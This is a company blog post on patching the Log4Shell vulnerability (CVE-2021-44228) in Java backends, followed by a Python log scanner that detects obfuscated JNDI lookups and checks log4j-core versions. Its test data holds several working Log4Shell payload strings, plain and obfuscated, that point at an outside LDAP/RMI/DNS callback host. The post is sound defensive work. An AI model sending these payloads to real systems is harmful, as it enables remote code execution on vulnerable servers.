
Log4J Vulnerability

On December 10, 2021, a bug in Log4J, a ubiquitous logging library present in many Java applications, was made public.
Rodrigo Demetrio

On December 10, 2021, a bug in Log4J, a ubiquitous logging library present in many Java applications, was made public. Detailed information about CVE-2021-44228 is linked at the end of this post. This is a quick update on how we addressed the issue in our backend applications, which are in great part built with Java Enterprise.

  1. We have upgraded the Spring Boot applications to the latest Log4J release available at the time: org.apache.logging.log4j:log4j-bom:2.15.0
  2. We configured the Spring Boot applications to ignore JNDI requests by setting spring.jndi.ignore to true in the application configuration.
  3. Every VM is now running with the JVM option -Dlog4j2.formatMsgNoLookups=true to mitigate any potential information disclosure.
  4. Our backend services are not exposed to the public internet; they operate behind a firewall/load balancer configuration. We have investigated our logs and security systems for JNDI/LDAP requests and could not find any, leading us to believe that our systems have not been scanned for these vulnerabilities.
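
The log review in the last step is the part worth making repeatable, because most payloads captured in the wild (see the Cloudflare write-up linked below) were obfuscated with nested lookups such as ${${lower:j}ndi:...} or ${${::-j}${::-n}di:...}, which a literal search for "jndi:ldap" misses. The Python below is an added example written for this edit, not code from Bureau Works or the original post. It collapses Log4j's lower:, upper: and ":-" default-value lookups from the inside out before matching, reports the scheme and callback host of each hit, and also checks a log4j-core Maven coordinate (as printed by mvn dependency:list) against 2.17.1, the first 2.x release for Java 8 and later that also fixes CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832, all reported after 2.15.0 shipped. The log lines are constructed, using RFC 5737 test addresses, and the combined access-log layout is an assumption.

```python
import re

# Constructed sample access-log lines (not taken from the original post). Three carry
# Log4Shell probes in the User-Agent field, one in the query string, one is benign.
# Addresses are RFC 5737 test ranges; the combined-log format is an assumption.
SAMPLE_LOG_LINES = [
    '203.0.113.7 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${${lower:j}${lower:n}di:${lower:rmi}://198.51.100.23:1099/obj}"',
    '203.0.113.11 - - [11/Dec/2021:03:16:01 +0000] "GET /api/v1/items HTTP/1.1" 200 2048 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.23:1389/x}"',
    '203.0.113.4 - - [11/Dec/2021:03:17:45 +0000] "GET /health HTTP/1.1" 200 15 "-" '
    '"Mozilla/5.0 (compatible; uptime-monitor)"',
    '203.0.113.12 - - [11/Dec/2021:03:18:30 +0000] '
    '"GET /?q=${jndi:dns://198.51.100.23/probe} HTTP/1.1" 400 0 "-" "curl/7.79.1"',
]

# An innermost lookup: ${...} whose body contains no further ${ or }.
_INNERMOST = re.compile(r'\$\{([^${}]*)\}')


def _resolve_one(match):
    """Expand the obfuscation lookups attackers nest to spell out "jndi"; leave all else."""
    body = match.group(1)
    if ':-' in body:                      # default-value syntax: ${prefix:key:-default}
        return body.split(':-', 1)[1]     # the lookup is built to fail, so the default is used
    if body.startswith('lower:'):
        return body[len('lower:'):].lower()
    if body.startswith('upper:'):
        return body[len('upper:'):].upper()
    return match.group(0)                 # ${jndi:...}, ${date:...} etc. stay as they are


def deobfuscate(text, max_passes=16):
    """Collapse nested Log4j-style lookups from the inside out until nothing changes."""
    for _ in range(max_passes):
        expanded = _INNERMOST.sub(_resolve_one, text)
        if expanded == text:
            break
        text = expanded
    return text


# Log4j's Interpolator lower-cases the lookup prefix, so match "jndi" case-insensitively.
_JNDI_LOOKUP = re.compile(r'\$\{jndi:([a-z]+)://([^}\s]+)\}', re.IGNORECASE)


def scan_line(line):
    """Return (scheme, callback target) for a JNDI lookup in the line, or None."""
    m = _JNDI_LOOKUP.search(deobfuscate(line))
    if not m:
        return None
    return m.group(1).lower(), m.group(2)


def scan_log(lines):
    """Return (line_number, scheme, target) for every line carrying a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        hit = scan_line(line)
        if hit is not None:
            findings.append((number, hit[0], hit[1]))
    return findings


def callback_hosts(findings):
    """Distinct host[:port] values the probes point at; useful as an egress block list."""
    return sorted({target.split('/', 1)[0] for _, _, target in findings})


# First 2.x release (Java 8+) that also fixes CVE-2021-45046, -45105 and -44832,
# all reported after 2.15.0 shipped. Older Java lines have their own fixed releases.
FIXED_LOG4J_CORE = (2, 17, 1)
_LOG4J_CORE_GAV = re.compile(r'org\.apache\.logging\.log4j:log4j-core:(?:jar:)?(\d+)\.(\d+)\.(\d+)')


def log4j_core_needs_upgrade(coordinate):
    """Check a Maven coordinate as printed by `mvn dependency:list`.

    True if it names a log4j-core below 2.17.1, False if at or above, None if not log4j-core.
    """
    m = _LOG4J_CORE_GAV.search(coordinate)
    if not m:
        return None
    return tuple(int(part) for part in m.groups()) < FIXED_LOG4J_CORE


if __name__ == '__main__':
    results = scan_log(SAMPLE_LOG_LINES)
    for number, scheme, target in results:
        print(f'line {number}: JNDI lookup via {scheme} -> {target}')
    print('callback hosts:', callback_hosts(results))
    print('2.15.0 still needs upgrade:',
          log4j_core_needs_upgrade('org.apache.logging.log4j:log4j-core:jar:2.15.0:compile'))
```

Run against real access logs, the scanner should be fed the raw request line and every header field that reaches a logger, not just the User-Agent; a hit is evidence that a probe was received, not that the lookup was resolved, so pair it with egress logs for outbound LDAP/RMI/DNS connections to the reported callback hosts. The deobfuscation only covers the lookups that expand to literal text; anything left as an unexpanded ${...} containing "jndi" after the passes is still worth a manual look.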

You can find more information about the Log4J vulnerability described in CVE-2021-44228 at these links:

  • https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
  • https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot
  • https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
  • https://github.com/YfryTchsGD/Log4jAttackSurface
Rodrigo Demetrio
Steering the marketing ship at Bureau Works with 17+ years of MarTech under my belt, I transform mere ideas into tangible realities. Passionate about languages and their power to build bridges, let's build a new one?